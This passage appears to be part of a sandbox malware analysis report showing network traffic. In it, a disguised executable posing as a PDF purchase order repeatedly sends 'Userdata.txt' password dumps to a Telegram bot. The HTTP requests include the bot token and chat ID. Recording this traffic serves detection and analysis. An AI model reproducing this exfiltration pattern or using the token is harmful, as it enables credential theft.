                                                                                                                                  2024-12-19 14:29:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 39 30 37 30 61 31 37 36 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd209070a17673Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:29:52 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:52 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:29:52 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19651,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618592,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.549796149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:55 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd20bd9321f276
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:29:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 62 64 39 33 32 31 66 32 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd20bd9321f276Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:29:56 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:56 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:29:56 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19655,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618596,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.549806149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:29:59 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd20e9132498be
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:29:59 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 65 39 31 33 32 34 39 38 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd20e9132498beContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:00 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:29:59 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:00 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 35 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19659,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618599,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.549827149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:08 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd2152005f10cf
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:30:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 35 32 30 30 35 66 31 30 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd2152005f10cfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:08 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:08 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:08 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 30 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19663,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618608,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.549859149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:20 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd21e32c16b31a
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:30:20 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 31 65 33 32 63 31 36 62 33 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd21e32c16b31aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:21 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:21 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:21 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19667,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618621,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.549871149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:25 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd222049205566
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-19 14:30:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 32 30 34 39 32 30 35 35 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd222049205566Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:25 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:25 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:25 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19669,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618625,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.549883149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:29 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd226c5ec256a2
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-19 14:30:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 32 36 63 35 65 63 32 35 36 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd226c5ec256a2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-19 14:30:30 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Thu, 19 Dec 2024 14:30:30 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 543
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-19 14:30:30 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 36 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 31 38 36 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":19671,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734618630,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.549893149.154.167.2204434796C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-19 14:30:33 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
